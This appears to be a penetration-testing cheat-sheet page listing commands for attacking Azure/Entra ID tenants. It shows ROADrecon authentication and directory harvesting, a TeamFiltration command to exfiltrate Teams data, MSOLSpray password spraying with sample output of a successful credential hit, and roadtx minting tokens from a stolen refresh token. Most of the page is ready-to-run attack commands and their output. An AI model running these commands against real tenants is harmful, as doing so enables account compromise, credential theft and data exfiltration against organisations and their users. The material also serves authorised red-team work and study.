TLDRBins TLDRBins / Azure Enum


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Recon

1. Authenticate

roadrecon auth -u '<USER>' -p '<PASSWORD>'
Sample Output: ┌──(venv)─(kali㉿kali)-[~] └─$ roadrecon auth -u 'apple.seed@example.com' -p 'Test1234' Tokens were written to .roadtools_auth

2. Info Gathering

roadrecon gather
Sample Output: ┌──(venv)─(kali㉿kali)-[~] └─$ roadrecon gather Starting data gathering phase 1 of 2 (collecting objects) Starting data gathering phase 2 of 2 (collecting properties and relationships) ROADrecon gather executed in 12.27 seconds and issued 1152 HTTP requests.

3. Explore the Data

roadrecon gui
Sample Output: ┌──(venv)─(kali㉿kali)-[~] └─$ roadrecon gui * Serving Flask app 'roadtools.roadrecon.server' * Debug mode: off WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. * Running on http://127.0.0.1:5000 Press CTRL+C to quit

Ref: ROADTools

1. Data Exfiltration

./TeamFiltration --roadtools .roadtools_auth --exfil --teams --outpath <OUTPUT_PATH>
Sample Output: TO-DO

Ref: TeamFiltration


Password Spraying

BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

1. Import Module

Import-Module MSOLSpray.ps1
Sample Output: TO-DO

2. Run

Invoke-MSOLSpray -UserList <USERS_FILE> -Password
Sample Output: ┌──(kali㉿kali)-[/home/kali/Desktop/MSOLSpray] └─PS> Invoke-MSOLSpray -UserList .\users.txt -Password Test1234 [*] There are 10 total users to spray. [*] Now spraying Microsoft Online. [*] Current date and time: 02/20/2025 14:48:11 [*] SUCCESS! apple.seed@example.com : Test1234

Ref: MSOLSpray


Generate Token with Refresh Token

roadtx gettokens --refresh-token '<SECRET>' -c '<CLIENT_ID>'
Sample Output: ┌──(venv)─(kali㉿kali)-[~] └─$ roadtx gettokens --refresh-token '1.Aa8AA...[SNIP]...zt4WQ' -c '04b07...[SNIP]...f7b46' Requesting token for resource https://graph.windows.net Tokens were written to .roadtools_auth

Ref: ROADTools